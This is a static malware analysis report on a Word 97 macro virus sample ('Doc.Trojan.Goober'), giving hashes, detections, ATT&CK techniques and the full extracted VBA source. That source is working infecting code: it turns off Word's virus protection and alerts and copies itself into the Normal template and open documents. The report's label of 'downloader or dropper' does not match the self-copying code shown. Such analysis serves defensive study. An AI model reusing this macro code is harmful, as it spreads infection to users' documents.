Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b1c94e86f044582a…

MALICIOUS

Office (OLE)

37.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d6c32658f3e2c2e394e320e424246979 SHA-1: d006ec2e6dbc2b342d33740947aede9af32ab39d SHA-256: b1c94e86f044582a768c34351338f31d1613fa07ddf1bdc4bf9b9d3398fb267f
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing VBA macros, specifically a Document_Open macro. This macro attempts to write its own code to 'C:\G00ber.sys' and then execute it. This behavior is indicative of a downloader or droppper malware. The ClamAV detection of 'Doc.Trojan.Goober-2' further supports this assessment.

Heuristics 3

  • ClamAV: Doc.Trojan.Goober-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Goober-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3504 bytes
SHA-256: b62845341728936842ae5c348899669d0b8a2f3864c88fbfbce13a44ad9d21ba
Detection
ClamAV: Doc.Trojan.Goober-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function SetCursorPos Lib "USER32" _
        (ByVal x As Long, ByVal y As Long) As Long

Private Declare Function GetCursorPos Lib "USER32" _
        (lpPoint As Punkt) As Long

Private Type Punkt
           xAchse As Long
           yAchse As Long
 End Type

Private Declare Sub Sleep Lib "kernel32" _
        (ByVal dwMilliseconds As Long)
Private Sub document_Open(): On Error Resume Next:

Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Options.ConfirmConversions = (0 - 0)
Options.SaveNormalPrompt = (1 - 1)
Options.VirusProtection = (2 - 2)


Open "C:\G00ber.sys" For Output As #1: Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines): Close #1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.SaveAs FileName = ActiveDocument.FullName

Set myRange = ActiveDocument.Range(Start:=0, End:=0)
With myRange.Find
    .ClearFormatting
    .Text = "ShiThe!"
    With .Replacement
        .ClearFormatting
        .Text = "The"
    End With
    .Execute Replace:=wdReplaceAll, Format:=True, MatchCase:=True, _
        MatchWholeWord:=True
End With

With myRange.Find
    .ClearFormatting
    .Text = "shithe!"
    With .Replacement
        .ClearFormatting
        .Text = "the"
    End With
    .Execute Replace:=wdReplaceAll, Format:=True, MatchCase:=True, _
        MatchWholeWord:=True
End With


End Sub
Private Sub document_New(): On Error Resume Next:

Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Options.ConfirmConversions = (0 - 0)
Options.SaveNormalPrompt = (1 - 1)
Options.VirusProtection = (2 - 2)


Open "C:\G00ber.sys" For Output As #1: Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines): Close #1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.SaveAs FileName = ActiveDocument.FullName
    

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.